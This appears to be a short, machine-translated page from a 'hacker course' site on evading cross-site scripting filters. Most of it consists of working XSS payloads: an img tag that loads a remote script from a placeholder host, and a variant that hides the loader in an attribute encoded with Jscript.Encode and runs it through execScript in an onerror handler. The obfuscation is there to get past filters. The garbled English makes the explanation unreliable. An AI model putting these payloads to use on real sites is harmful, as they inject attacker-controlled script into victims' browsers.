|
<img src= " javascript: try {var s=document.createElement ('script'); s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){} “></img>
How does the character filter manages? Encrypts after Encode on invincible ~
Before has not encrypted:
<img src='#' XSS= " try {var s=document.createElement ('script'); s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}” onerror= " execScript (decodeURI (this.XSS), 'Jscript.Encode'); ” >
After the encryption:
<img src='#' XSS= " #@~^bQAAAA==OMX `7lMP/{NK^Es+UYcm.nmY+As+s+xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp? U N/vpNKmEs+ OR (W [Xcl22 xN; 4k^N `kbI81lDm4 `nbP8XCcAAA==^#~@ “onerror= " execScript (decodeURI (this.XSS), 'Jscript.Encode'); ” >
How heh heh ~ stimulation does ~ use you to test again, after must use normally also needs encodeURI processes a Encode encryption the code
|
You are here: hacking technology
> hacker course
> Content
Category: